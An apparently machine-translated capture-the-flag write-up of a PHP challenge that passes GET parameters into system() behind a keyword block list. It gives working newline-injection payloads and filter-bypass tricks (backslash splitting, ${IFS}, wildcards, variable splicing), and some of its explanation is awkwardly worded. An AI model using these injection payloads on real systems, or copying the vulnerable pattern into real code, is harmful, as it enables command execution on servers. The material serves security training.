0x01 paste the code
<?php
highlight_file(__FILE__);
$a = $_GET['a'];
$b = $_GET['b'];
// try bypass it
if (preg_match("/\'|\"|,|;|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $a))
$a = "";
$a ='"' . $a . '"';
if (preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $b))
$b = "";
$b = '"' . $b . '"';
$cmd = "file $a $b";
str_replace(" ","","$cmd");
system($cmd);
?>
0x02 analysis
The first is filtered cat, more and flag and other words, here you can use \
to bypass, for example c\at fla\g.php
, (here the reason may be \
because the title preg_match
in \\
the wording of the equivalent of no filter \
), and we know linux
, the line breaks can be a as command separators.
php regular little vulnerability, two slashes thrown php
only a slash, and then thrown into the slashes to escape to the regular
Due to this small flaw, A is filtered |*
instead *
, b was filtered |\n
, instead of being filtered\n
payload: http://127.0.0.1/?a=\&b=%0Aca\t%20index.php%0A
the $cmd var_dump
result of string(27) "file "\" " ca\t index.php "" "
(the middle of a line break)
0x03 knowledge summary
1, the command added \
for bypassing the keyword filters
2, can also be used to bypass such an environment variable value ${path:0:1}
, but here the filter {}
, this method can not be used, env
a command can display all the variables environment
3, for two command filter Circumvention methods species, is a linux, wildcard ?
bypass, such as var
writtenv?r
expr${IFS}substr${IFS}“this is a test”${IFS}3${IFS}5
3, can use the command to bypass the splicing manner a=1;b=s;$a$b
, semicolons to %0A
newline to http://127.0.0.1/?a=\&b=%0Ac=ca%0Ad=t%0A$c$d index.php%0A
4, different systems different closings
- In Unix systems, the end of each row only "<wrap>", i.e., "\ n" (% 0A)
- Win in the system, the end of each line is "<ENTER> <line feed>", i.e., "\ r \ n"
- On the Mac, the end of each line is "<Enter>", that is, "\ r" (% 0D)